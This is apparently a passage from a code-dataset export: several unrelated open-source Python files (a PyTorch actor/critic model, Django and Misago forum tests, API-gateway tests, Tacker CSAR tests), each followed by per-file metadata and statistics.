self.hiddenLayers = [stateSize, *hiddenLayers]
# check if and where batchNorm should be added
batchCount = 0
if batchNormAfterLayers!= None :
nextBatchLayer = batchNormAfterLayers[0]
else:
nextBatchLayer = None
self.network = nn.ModuleList([])
i = 0
for s1,s2 in zip(self.hiddenLayers[:-1],self.hiddenLayers[1:]):
# check if to attach batch-norm here
if i == nextBatchLayer:
self.network.append(nn.BatchNorm1d(s1)) # append the batch layer
batchCount = min( len(batchNormAfterLayers)-1,batchCount+1) # adjust index running over batch-norm layers
nextBatchLayer = batchNormAfterLayers[batchCount] # get the position of the next batch-norm layer
self.network.append(nn.Linear(s1,s2))
i+=1
self.outLayer = nn.Linear(s2,actionSize)
self.reset_parameters()
def reset_parameters(self):
for layer in self.network:
if type(layer) == nn.Linear:
layer.weight.data.uniform_(*hidden_init(layer))
self.outLayer.weight.data.uniform_(-3e-3, 3e-3)
def forward(self, state):
nextX = state
for layer in self.network:
if type(layer) == nn.Linear:
nextX = F.relu(layer(nextX))
else: #this should be a batch-layer
nextX = layer(nextX)
return torch.tanh(self.outLayer(nextX))
class Critic(nn.Module):
"""Critic (Value) Model."""
def __init__(self, stateSize,actionSize,
hiddenLayers=[256,128],
batchNormAfterLayers=None,
attachActionToLayer=1,
seed = None):
"""Initialize parameters and build model.
Params
======
"""
super(Critic, self).__init__()
self.seed = torch.manual_seed(seed) if seed is not None else None # seeding with None would raise
self.attachActionToLayer = attachActionToLayer
self.hiddenLayers = [stateSize, *hiddenLayers]
# check if and where batchNorm should be added
batchCount = 0
if batchNormAfterLayers!= None :
nextBatchLayer = batchNormAfterLayers[batchCount]
else:
nextBatchLayer = None
self.network = nn.ModuleList([])
i = 0
for s1,s2 in zip(self.hiddenLayers[:-1],self.hiddenLayers[1:]):
# check if the action should be attached here
# and adjust the size of the layer
if i == attachActionToLayer:
s1 += actionSize
# check if to attach batch-norm here
if i == nextBatchLayer:
self.network.append(nn.BatchNorm1d(s1)) # append the batch layer
batchCount = min( len(batchNormAfterLayers)-1,batchCount+1) # adjust index running over batch-norm layers
nextBatchLayer = batchNormAfterLayers[batchCount] # get the position of the next batch-norm layer
# if the action has not been attached yet
# we have to shift the index of the layer it should be attached to
# because an additional batch layer has been added
if attachActionToLayer > i:
self.attachActionToLayer += 1
self.network.append(nn.Linear(s1,s2))
i+=1
self.outLayer = nn.Linear(s2,1)
self.reset_parameters()
def reset_parameters(self):
for layer in self.network:
if type(layer) == nn.Linear:
layer.weight.data.uniform_(*hidden_init(layer))
self.outLayer.weight.data.uniform_(-3e-3, 3e-3)
def forward(self, state, action):
nextX = state
i = 0
for layer in self.network:
if i == self.attachActionToLayer:
nextX = torch.cat((nextX, action), dim=1)
if type(layer) == nn.Linear:
nextX = F.relu(layer(nextX))
else: #this should be a batch-layer
nextX = layer(nextX)
i+=1
return self.outLayer(nextX)
| 30.295858 | 132 | 0.535352 | 531 | 5,120 | 5.103578 | 0.222222 | 0.04059 | 0.025092 | 0.028044 | 0.736162 | 0.736162 | 0.727675 | 0.727675 | 0.727675 | 0.661993 | 0 | 0.020006 | 0.375195 | 5,120 | 168 | 133 | 30.47619 | 0.827133 | 0.175781 | 0 | 0.706522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076087 | false | 0 | 0.043478 | 0 | 0.173913 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4b03192fb2d6b51837641ab19453bb7e0599de24 | 131 | py | Python | nsd1902/devweb/ansible_pro/myansible/mainpage/views.py | MrWangwf/nsd2019 | 5e859b4b1926dc098d236be3720779c50d0a55fc | [
"Apache-2.0"
] | 1 | 2019-09-19T04:53:22.000Z | 2019-09-19T04:53:22.000Z | nsd1902/devweb/ansible_pro/myansible/mainpage/views.py | MrWangwf/nsd2019 | 5e859b4b1926dc098d236be3720779c50d0a55fc | [
"Apache-2.0"
] | null | null | null | nsd1902/devweb/ansible_pro/myansible/mainpage/views.py | MrWangwf/nsd2019 | 5e859b4b1926dc098d236be3720779c50d0a55fc | [
"Apache-2.0"
] | 1 | 2021-12-28T04:26:02.000Z | 2021-12-28T04:26:02.000Z | from django.shortcuts import render
# Create your views here.
def mainpage(request):
return render(request, 'mainpage.html')
| 18.714286 | 43 | 0.755725 | 17 | 131 | 5.823529 | 0.823529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.152672 | 131 | 6 | 44 | 21.833333 | 0.891892 | 0.175573 | 0 | 0 | 0 | 0 | 0.122642 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
d99e35069db69a81c97302e126ea6c356d598bda | 15,597 | py | Python | misago/misago/threads/tests/test_gotoviews.py | vascoalramos/misago-deployment | 20226072138403108046c0afad9d99eb4163cedc | [
"MIT"
] | 2 | 2021-03-06T21:06:13.000Z | 2021-03-09T15:05:12.000Z | misago/misago/threads/tests/test_gotoviews.py | vascoalramos/misago-deployment | 20226072138403108046c0afad9d99eb4163cedc | [
"MIT"
] | null | null | null | misago/misago/threads/tests/test_gotoviews.py | vascoalramos/misago-deployment | 20226072138403108046c0afad9d99eb4163cedc | [
"MIT"
] | null | null | null | from django.utils import timezone
from .. import test
from ...categories.models import Category
from ...conf.test import override_dynamic_settings
from ...readtracker.poststracker import save_read
from ...users.test import AuthenticatedUserTestCase
from ..test import patch_category_acl
GOTO_URL = "%s#post-%s"
GOTO_PAGE_URL = "%s%s/#post-%s"
POSTS_PER_PAGE = 7
POSTS_PER_PAGE_ORPHANS = 3
class GotoViewTestCase(AuthenticatedUserTestCase):
def setUp(self):
super().setUp()
self.category = Category.objects.get(slug="first-category")
self.thread = test.post_thread(category=self.category)
class GotoPostTests(GotoViewTestCase):
def test_goto_first_post(self):
"""first post redirect url is valid"""
response = self.client.get(self.thread.first_post.get_absolute_url())
self.assertEqual(response.status_code, 302)
self.assertEqual(
response["location"],
GOTO_URL % (self.thread.get_absolute_url(), self.thread.first_post_id),
)
response = self.client.get(response["location"])
self.assertContains(response, self.thread.first_post.get_absolute_url())
@override_dynamic_settings(
posts_per_page=POSTS_PER_PAGE, posts_per_page_orphans=POSTS_PER_PAGE_ORPHANS
)
def test_goto_last_post_on_page(self):
"""last post on page redirect url is valid"""
for _ in range(POSTS_PER_PAGE + POSTS_PER_PAGE_ORPHANS - 1):
post = test.reply_thread(self.thread)
response = self.client.get(post.get_absolute_url())
self.assertEqual(response.status_code, 302)
self.assertEqual(
response["location"], GOTO_URL % (self.thread.get_absolute_url(), post.pk)
)
response = self.client.get(response["location"])
self.assertContains(response, post.get_absolute_url())
@override_dynamic_settings(
posts_per_page=POSTS_PER_PAGE, posts_per_page_orphans=POSTS_PER_PAGE_ORPHANS
)
def test_goto_first_post_on_next_page(self):
"""first post on next page redirect url is valid"""
for _ in range(POSTS_PER_PAGE + POSTS_PER_PAGE_ORPHANS):
post = test.reply_thread(self.thread)
response = self.client.get(post.get_absolute_url())
self.assertEqual(response.status_code, 302)
self.assertEqual(
response["location"],
GOTO_PAGE_URL % (self.thread.get_absolute_url(), 2, post.pk),
)
response = self.client.get(response["location"])
self.assertContains(response, post.get_absolute_url())
@override_dynamic_settings(
posts_per_page=POSTS_PER_PAGE, posts_per_page_orphans=POSTS_PER_PAGE_ORPHANS
)
def test_goto_first_post_on_page_three_out_of_five(self):
"""first post on next page redirect url is valid"""
posts = []
for _ in range(POSTS_PER_PAGE * 4 - 1):
post = test.reply_thread(self.thread)
posts.append(post)
post = posts[POSTS_PER_PAGE * 2 - 3]
response = self.client.get(post.get_absolute_url())
self.assertEqual(response.status_code, 302)
self.assertEqual(
response["location"],
GOTO_PAGE_URL % (self.thread.get_absolute_url(), 3, post.pk),
)
response = self.client.get(response["location"])
self.assertContains(response, post.get_absolute_url())
@override_dynamic_settings(
posts_per_page=POSTS_PER_PAGE, posts_per_page_orphans=POSTS_PER_PAGE_ORPHANS
)
def test_goto_first_event_on_page_three_out_of_five(self):
"""event redirect url is valid"""
posts = []
for _ in range(POSTS_PER_PAGE * 4 - 1):
post = test.reply_thread(self.thread)
posts.append(post)
post = posts[POSTS_PER_PAGE * 2 - 2]
self.thread.has_events = True
self.thread.save()
post.is_event = True
post.save()
response = self.client.get(post.get_absolute_url())
self.assertEqual(response.status_code, 302)
self.assertEqual(
response["location"],
GOTO_PAGE_URL % (self.thread.get_absolute_url(), 3, post.pk),
)
response = self.client.get(response["location"])
self.assertContains(response, post.get_absolute_url())
class GotoLastTests(GotoViewTestCase):
def test_goto_last_post(self):
"""first post redirect url is valid"""
response = self.client.get(self.thread.get_last_post_url())
self.assertEqual(response.status_code, 302)
self.assertEqual(
response["location"],
GOTO_URL % (self.thread.get_absolute_url(), self.thread.first_post_id),
)
response = self.client.get(response["location"])
self.assertContains(response, self.thread.last_post.get_absolute_url())
@override_dynamic_settings(
posts_per_page=POSTS_PER_PAGE, posts_per_page_orphans=POSTS_PER_PAGE_ORPHANS
)
def test_goto_last_post_on_page(self):
"""last post on page redirect url is valid"""
for _ in range(POSTS_PER_PAGE + POSTS_PER_PAGE_ORPHANS - 1):
post = test.reply_thread(self.thread)
response = self.client.get(self.thread.get_last_post_url())
self.assertEqual(response.status_code, 302)
self.assertEqual(
response["location"], GOTO_URL % (self.thread.get_absolute_url(), post.pk)
)
response = self.client.get(response["location"])
self.assertContains(response, post.get_absolute_url())
class GotoNewTests(GotoViewTestCase):
def test_goto_first_post(self):
"""first unread post redirect url is valid"""
response = self.client.get(self.thread.get_new_post_url())
self.assertEqual(response.status_code, 302)
self.assertEqual(
response["location"],
GOTO_URL % (self.thread.get_absolute_url(), self.thread.first_post_id),
)
@override_dynamic_settings(
posts_per_page=POSTS_PER_PAGE, posts_per_page_orphans=POSTS_PER_PAGE_ORPHANS
)
def test_goto_first_new_post(self):
"""first unread post redirect url in already read thread is valid"""
save_read(self.user, self.thread.first_post)
post = test.reply_thread(self.thread, posted_on=timezone.now())
for _ in range(POSTS_PER_PAGE + POSTS_PER_PAGE_ORPHANS - 1):
test.reply_thread(self.thread, posted_on=timezone.now())
response = self.client.get(self.thread.get_new_post_url())
self.assertEqual(response.status_code, 302)
self.assertEqual(
response["location"], GOTO_URL % (self.thread.get_absolute_url(), post.pk)
)
@override_dynamic_settings(
posts_per_page=POSTS_PER_PAGE, posts_per_page_orphans=POSTS_PER_PAGE_ORPHANS
)
def test_goto_first_new_post_on_next_page(self):
"""first unread post redirect url in already read multipage thread is valid"""
save_read(self.user, self.thread.first_post)
for _ in range(POSTS_PER_PAGE + POSTS_PER_PAGE_ORPHANS):
last_post = test.reply_thread(self.thread, posted_on=timezone.now())
save_read(self.user, last_post)
post = test.reply_thread(self.thread, posted_on=timezone.now())
for _ in range(POSTS_PER_PAGE + POSTS_PER_PAGE_ORPHANS - 1):
test.reply_thread(self.thread, posted_on=timezone.now())
response = self.client.get(self.thread.get_new_post_url())
self.assertEqual(response.status_code, 302)
self.assertEqual(
response["location"],
GOTO_PAGE_URL % (self.thread.get_absolute_url(), 2, post.pk),
)
@override_dynamic_settings(
posts_per_page=POSTS_PER_PAGE, posts_per_page_orphans=POSTS_PER_PAGE_ORPHANS
)
def test_goto_first_new_post_in_read_thread(self):
"""goto new in read thread points to last post"""
save_read(self.user, self.thread.first_post)
for _ in range(POSTS_PER_PAGE + POSTS_PER_PAGE_ORPHANS):
post = test.reply_thread(self.thread, posted_on=timezone.now())
save_read(self.user, post)
response = self.client.get(self.thread.get_new_post_url())
self.assertEqual(response.status_code, 302)
self.assertEqual(
response["location"],
GOTO_PAGE_URL % (self.thread.get_absolute_url(), 2, post.pk),
)
@override_dynamic_settings(
posts_per_page=POSTS_PER_PAGE, posts_per_page_orphans=POSTS_PER_PAGE_ORPHANS
)
def test_guest_goto_first_new_post_in_thread(self):
"""guest goto new in read thread points to last post"""
for _ in range(POSTS_PER_PAGE + POSTS_PER_PAGE_ORPHANS):
post = test.reply_thread(self.thread, posted_on=timezone.now())
self.logout_user()
response = self.client.get(self.thread.get_new_post_url())
self.assertEqual(response.status_code, 302)
self.assertEqual(
response["location"],
GOTO_PAGE_URL % (self.thread.get_absolute_url(), 2, post.pk),
)
class GotoBestAnswerTests(GotoViewTestCase):
def test_view_handles_no_best_answer(self):
"""if thread has no best answer, redirect to first post"""
response = self.client.get(self.thread.get_best_answer_url())
self.assertEqual(response.status_code, 302)
self.assertEqual(
response["location"],
GOTO_URL % (self.thread.get_absolute_url(), self.thread.first_post_id),
)
@override_dynamic_settings(
posts_per_page=POSTS_PER_PAGE, posts_per_page_orphans=POSTS_PER_PAGE_ORPHANS
)
def test_view_handles_best_answer(self):
"""if thread has best answer, redirect to it"""
for _ in range(POSTS_PER_PAGE + POSTS_PER_PAGE_ORPHANS):
test.reply_thread(self.thread, posted_on=timezone.now())
best_answer = test.reply_thread(self.thread, posted_on=timezone.now())
self.thread.set_best_answer(self.user, best_answer)
self.thread.save()
for _ in range(POSTS_PER_PAGE + POSTS_PER_PAGE_ORPHANS - 1):
test.reply_thread(self.thread, posted_on=timezone.now())
response = self.client.get(self.thread.get_best_answer_url())
self.assertEqual(response.status_code, 302)
self.assertEqual(
response["location"],
GOTO_PAGE_URL % (self.thread.get_absolute_url(), 2, best_answer.pk),
)
class GotoUnapprovedTests(GotoViewTestCase):
def test_view_validates_permission(self):
"""view validates permission to see unapproved posts"""
response = self.client.get(self.thread.get_unapproved_post_url())
self.assertContains(
response, "You need permission to approve content", status_code=403
)
with patch_category_acl({"can_approve_content": True}):
response = self.client.get(self.thread.get_unapproved_post_url())
self.assertEqual(response.status_code, 302)
@patch_category_acl({"can_approve_content": True})
def test_view_handles_no_unapproved_posts(self):
"""if thread has no unapproved posts, redirect to last post"""
response = self.client.get(self.thread.get_unapproved_post_url())
self.assertEqual(response.status_code, 302)
self.assertEqual(
response["location"],
GOTO_URL % (self.thread.get_absolute_url(), self.thread.first_post_id),
)
@override_dynamic_settings(
posts_per_page=POSTS_PER_PAGE, posts_per_page_orphans=POSTS_PER_PAGE_ORPHANS
)
@patch_category_acl({"can_approve_content": True})
def test_view_handles_unapproved_posts(self):
"""if thread has unapproved posts, redirect to first of them"""
for _ in range(POSTS_PER_PAGE + POSTS_PER_PAGE_ORPHANS):
test.reply_thread(self.thread, posted_on=timezone.now())
post = test.reply_thread(
self.thread, is_unapproved=True, posted_on=timezone.now()
)
for _ in range(POSTS_PER_PAGE + POSTS_PER_PAGE_ORPHANS - 1):
test.reply_thread(self.thread, posted_on=timezone.now())
response = self.client.get(self.thread.get_unapproved_post_url())
self.assertEqual(response.status_code, 302)
self.assertEqual(
response["location"],
GOTO_PAGE_URL % (self.thread.get_absolute_url(), 2, post.pk),
)
class ThreadGotoPostTests(GotoViewTestCase):
"""brureforcing regression tests for regression test for #869"""
def test_thread_growing_post_goto(self):
"""growing thread goto views don't fail"""
for _ in range(60):
post = test.reply_thread(self.thread, posted_on=timezone.now())
# go to post link is valid
post_url = self.client.get(post.get_absolute_url())["location"]
response = self.client.get(post_url)
self.assertContains(response, post.get_absolute_url())
# go to last post link is valid
last_url = self.client.get(self.thread.get_last_post_url())["location"]
self.assertEqual(post_url, last_url)
def test_thread_growing_event_goto(self):
"""growing thread goto views don't fail for events"""
for i in range(60):
test.reply_thread(self.thread, posted_on=timezone.now())
post = test.reply_thread(self.thread, posted_on=timezone.now())
post.is_event = True
post.save()
# go to post link is valid
post_url = self.client.get(post.get_absolute_url())["location"]
if i == 0:
# manually set events flag after first event was created
self.thread.has_events = True
self.thread.save()
response = self.client.get(post_url)
self.assertContains(response, post.get_absolute_url())
# go to last post link is valid
last_url = self.client.get(self.thread.get_last_post_url())["location"]
self.assertEqual(post_url, last_url)
def test_thread_post_goto(self):
"""thread goto views don't fail"""
for _ in range(60):
test.reply_thread(self.thread, posted_on=timezone.now())
for post in self.thread.post_set.order_by("id").iterator():
# go to post link is valid
post_url = self.client.get(post.get_absolute_url())["location"]
response = self.client.get(post_url)
self.assertContains(response, post.get_absolute_url())
# go to last post link is valid
last_url = self.client.get(self.thread.get_last_post_url())["location"]
self.assertEqual(post_url, last_url)
def test_thread_event_goto(self):
"""thread goto views don't fail for events"""
for _ in range(60):
test.reply_thread(self.thread, posted_on=timezone.now())
post = test.reply_thread(self.thread, posted_on=timezone.now())
post.is_event = True
post.save()
for post in (
self.thread.post_set.filter(is_event=True).order_by("id").iterator()
):
# go to post link is valid
post_url = self.client.get(post.get_absolute_url())["location"]
response = self.client.get(post_url)
self.assertContains(response, post.get_absolute_url())
# go to last post link is valid
last_url = self.client.get(self.thread.get_last_post_url())["location"]
self.assertEqual(post_url, last_url)
| 39.287154 | 86 | 0.664359 | 2,017 | 15,597 | 4.83292 | 0.066931 | 0.081042 | 0.091096 | 0.068219 | 0.876487 | 0.867973 | 0.852483 | 0.83771 | 0.820989 | 0.799549 | 0 | 0.007509 | 0.231583 | 15,597 | 396 | 87 | 39.386364 | 0.805841 | 0.082324 | 0 | 0.680702 | 0 | 0 | 0.027054 | 0 | 0 | 0 | 0 | 0 | 0.17193 | 1 | 0.077193 | false | 0 | 0.024561 | 0 | 0.126316 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d9c24bda6eb3ab4a39db281be5bdf1ecfd85193c | 43 | py | Python | openselfsup/models/backbones/__init__.py | youqingxiaozhua/OpenSelfSup | 7e94af11d8bec67cace70fb881e45228224fe14d | [
"Apache-2.0"
] | 1,624 | 2020-06-16T04:03:15.000Z | 2021-12-16T03:42:24.000Z | openselfsup/models/backbones/__init__.py | changlin31/OpenSelfSup | ab8fc27c6b43679317eaf312b85461ba490606af | [
"Apache-2.0"
] | 91 | 2020-06-16T13:57:20.000Z | 2021-12-06T09:24:03.000Z | openselfsup/models/backbones/__init__.py | changlin31/OpenSelfSup | ab8fc27c6b43679317eaf312b85461ba490606af | [
"Apache-2.0"
] | 235 | 2020-06-16T05:45:52.000Z | 2021-12-15T02:43:21.000Z | from .resnet import ResNet, make_res_layer
| 21.5 | 42 | 0.837209 | 7 | 43 | 4.857143 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.116279 | 43 | 1 | 43 | 43 | 0.894737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d9e6c5ea9e3ed68e26cd246667b37c630acbce2d | 300 | py | Python | sklearnbot/utils/misc.py | hp2500/sklearn-bot | 4a84ae7d58a54b90802978782ea7a33a05031de2 | [
"BSD-3-Clause"
] | null | null | null | sklearnbot/utils/misc.py | hp2500/sklearn-bot | 4a84ae7d58a54b90802978782ea7a33a05031de2 | [
"BSD-3-Clause"
] | null | null | null | sklearnbot/utils/misc.py | hp2500/sklearn-bot | 4a84ae7d58a54b90802978782ea7a33a05031de2 | [
"BSD-3-Clause"
] | null | null | null | from time import gmtime, strftime
def get_time():
    """
    Returns a string representing the time, to be used in string output to the
    stdout and stderr

    Returns
    -------
    time: str
        A string representing the time
    """
    return strftime("[%Y-%m-%d %H:%M:%S]", gmtime())
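For reference, the same `strftime` pattern can be exercised on its own — a stdlib-only sketch mirroring the call in `get_time()` above:

```python
from time import gmtime, strftime

# Same format string as get_time(): a bracketed UTC timestamp,
# e.g. "[2019-01-31 08:30:00]".
stamp = strftime("[%Y-%m-%d %H:%M:%S]", gmtime())
```

The result is always 21 characters: brackets, a 10-character date, a space, and an 8-character time.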
| 20 | 78 | 0.6 | 42 | 300 | 4.261905 | 0.642857 | 0.078212 | 0.212291 | 0.24581 | 0.290503 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.273333 | 300 | 14 | 79 | 21.428571 | 0.821101 | 0.513333 | 0 | 0 | 0 | 0 | 0.172727 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8a13af17632468096ed35d2e2d2874ce2796756a | 1,169 | py | Python | tests/test_upstream_repository.py | sunwei/ddd-api-gateway | 438c1bdcf7f10d383cf9d7c596c39bf88b8756cd | [
"MIT"
] | null | null | null | tests/test_upstream_repository.py | sunwei/ddd-api-gateway | 438c1bdcf7f10d383cf9d7c596c39bf88b8756cd | [
"MIT"
] | null | null | null | tests/test_upstream_repository.py | sunwei/ddd-api-gateway | 438c1bdcf7f10d383cf9d7c596c39bf88b8756cd | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Test ApiGW"""
import pytest
from ddd_api_gateway.apigw_factory import create_api_gw
from ddd_api_gateway.upstream_repository import UpstreamRepository
@pytest.mark.usefixtures("api_gw_json_data")
def test_find_upstream_by_id(api_gw_json_data):
    api_gw_instance = create_api_gw("json", data=api_gw_json_data)
    repository = UpstreamRepository(upstreams=api_gw_instance.upstreams)
    first_upstream = repository.upstreams[0]
    assert repository.find(first_upstream.id) is first_upstream


@pytest.mark.usefixtures("api_gw_json_data")
def test_find_upstream_by_name(api_gw_json_data):
    api_gw_instance = create_api_gw("json", data=api_gw_json_data)
    repository = UpstreamRepository(upstreams=api_gw_instance.upstreams)
    first_upstream = repository.upstreams[0]
    assert repository.find_by_name(first_upstream.name) is first_upstream


@pytest.mark.usefixtures("api_gw_json_data")
def test_find_all_upstreams(api_gw_json_data):
    api_gw_instance = create_api_gw("json", data=api_gw_json_data)
    repository = UpstreamRepository(upstreams=api_gw_instance.upstreams)
    assert repository.find_all() is repository.upstreams
| 40.310345 | 73 | 0.813516 | 169 | 1,169 | 5.195266 | 0.195266 | 0.1082 | 0.123007 | 0.177677 | 0.731207 | 0.731207 | 0.731207 | 0.731207 | 0.731207 | 0.731207 | 0 | 0.002846 | 0.098375 | 1,169 | 28 | 74 | 41.75 | 0.830171 | 0.028229 | 0 | 0.55 | 0 | 0 | 0.053097 | 0 | 0 | 0 | 0 | 0 | 0.15 | 1 | 0.15 | false | 0 | 0.15 | 0 | 0.3 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8a18f4c0169b7e8663c75671f3e4b63eb6a1e3cd | 23,878 | py | Python | tacker/tests/unit/common/test_csar_utils.py | SSU-DCN/tacker | d886ac7fec3d9cf6e0cefc5d2fa89a733a5255ae | [
"Apache-2.0"
] | null | null | null | tacker/tests/unit/common/test_csar_utils.py | SSU-DCN/tacker | d886ac7fec3d9cf6e0cefc5d2fa89a733a5255ae | [
"Apache-2.0"
] | null | null | null | tacker/tests/unit/common/test_csar_utils.py | SSU-DCN/tacker | d886ac7fec3d9cf6e0cefc5d2fa89a733a5255ae | [
"Apache-2.0"
] | 1 | 2020-11-16T02:14:35.000Z | 2020-11-16T02:14:35.000Z | # Copyright (c) 2019 NTT DATA.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import shutil
import tempfile
import testtools
from unittest import mock
import uuid
import zipfile
from tacker.common import csar_utils
from tacker.common import exceptions
from tacker import context
from tacker.tests import constants
from tacker.tests import utils
class TestCSARUtils(testtools.TestCase):
    def setUp(self):
        super(TestCSARUtils, self).setUp()
        self.context = context.get_admin_context()

    def _get_csar_file_path(self, file_name):
        return os.path.join("./tacker/tests/etc/samples", file_name)

    @mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
    def test_load_csar_data(self, mock_extract_csar_zip_file):
        file_path, _ = utils.create_csar_with_unique_vnfd_id(
            './tacker/tests/etc/samples/etsi/nfv/'
            'sample_vnfpkg_tosca_vnfd')
        self.addCleanup(os.remove, file_path)
        vnf_data, flavours, vnf_artifacts = csar_utils.load_csar_data(
            self.context, constants.UUID, file_path)
        self.assertEqual(vnf_data['descriptor_version'], '1.0')
        self.assertEqual(vnf_data['vnfm_info'], ['Tacker'])
        self.assertEqual(flavours[0]['flavour_id'], 'simple')
        self.assertIsNotNone(flavours[0]['sw_images'])

    @mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
    def test_load_csar_data_with_single_yaml(
            self, mock_extract_csar_zip_file):
        file_path, _ = utils.create_csar_with_unique_vnfd_id(
            './tacker/tests/etc/samples/etsi/nfv/'
            'sample_vnfpkg_no_meta_single_vnfd')
        self.addCleanup(os.remove, file_path)
        vnf_data, flavours, vnf_artifacts = csar_utils.load_csar_data(
            self.context, constants.UUID, file_path)
        self.assertEqual(vnf_data['descriptor_version'], '1.0')
        self.assertEqual(vnf_data['vnfm_info'], ['Tacker'])
        self.assertEqual(flavours[0]['flavour_id'], 'simple')
        self.assertIsNotNone(flavours[0]['sw_images'])

    def _get_csar_zip_from_dir(self, dir_name):
        csar_dir_path = os.path.join('test_csar_utils_data', dir_name)
        unique_name = str(uuid.uuid4())
        csar_temp_dir = os.path.join('/tmp', unique_name)
        self.addCleanup(shutil.rmtree, csar_temp_dir)
        utils.copy_csar_files(csar_temp_dir, csar_dir_path)

        # Copy contents from 'test_csar_utils_common' to 'csar_temp_dir'.
        common_dir_path = ('./tacker/tests/etc/samples/etsi/nfv/'
                           'test_csar_utils_data/test_csar_utils_common')
        common_yaml_file = os.path.join(common_dir_path,
                                        'Definitions/helloworld3_types.yaml')
        shutil.copy(common_yaml_file,
                    os.path.join(csar_temp_dir, 'Definitions/'))
        shutil.copytree(os.path.join(common_dir_path, "TOSCA-Metadata/"),
                        os.path.join(csar_temp_dir, "TOSCA-Metadata/"))

        # Create temporary zip file from 'csar_temp_dir'
        tempfd, tempname = tempfile.mkstemp(suffix=".zip", dir=csar_temp_dir)
        os.close(tempfd)
        zcsar = zipfile.ZipFile(tempname, 'w')
        for (dpath, _, fnames) in os.walk(csar_temp_dir):
            for fname in fnames:
                src_file = os.path.join(dpath, fname)
                dst_file = os.path.relpath(os.path.join(dpath, fname),
                                           csar_temp_dir)
                zcsar.write(src_file, dst_file)
        zcsar.close()
        return tempname

    @mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
    def test_load_csar_data_in_meta_and_manifest_with_vnf_artifact(
            self, mock_extract_csar_zip_file):
        file_path = utils.create_csar_with_unique_artifact(
            './tacker/tests/etc/samples/etsi/nfv/'
            'sample_vnf_package_csar_in_meta_and_manifest')
        self.addCleanup(os.remove, file_path)
        vnf_data, flavours, vnf_artifacts = csar_utils.load_csar_data(
            self.context, constants.UUID, file_path)
        self.assertEqual(vnf_data['descriptor_version'], '1.0')
        self.assertEqual(vnf_data['vnfm_info'], ['Tacker'])
        self.assertEqual(flavours[0]['flavour_id'], 'simple')
        self.assertIsNotNone(flavours[0]['sw_images'])
        self.assertIsNotNone(vnf_artifacts)
        self.assertIsNotNone(vnf_artifacts[0]['Source'])
        self.assertIsNotNone(vnf_artifacts[0]['Hash'])
        for item in vnf_artifacts:
            flag = item.get('Source').lower().endswith('.img')
            self.assertEqual(flag, False)

    @mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
    def test_load_csar_data_with_single_manifest_with_vnf_artifact(
            self, mock_extract_csar_zip_file):
        file_path = utils.create_csar_with_unique_artifact(
            './tacker/tests/etc/samples/etsi/nfv/'
            'sample_vnf_package_csar_manifest')
        self.addCleanup(os.remove, file_path)
        vnf_data, flavours, vnf_artifacts = csar_utils.load_csar_data(
            self.context, constants.UUID, file_path)
        self.assertEqual(vnf_data['descriptor_version'], '1.0')
        self.assertEqual(vnf_data['vnfm_info'], ['Tacker'])
        self.assertEqual(flavours[0]['flavour_id'], 'simple')
        self.assertIsNotNone(flavours[0]['sw_images'])
        self.assertIsNotNone(vnf_artifacts)
        self.assertIsNotNone(vnf_artifacts[0]['Source'])
        self.assertIsNotNone(vnf_artifacts[0]['Hash'])

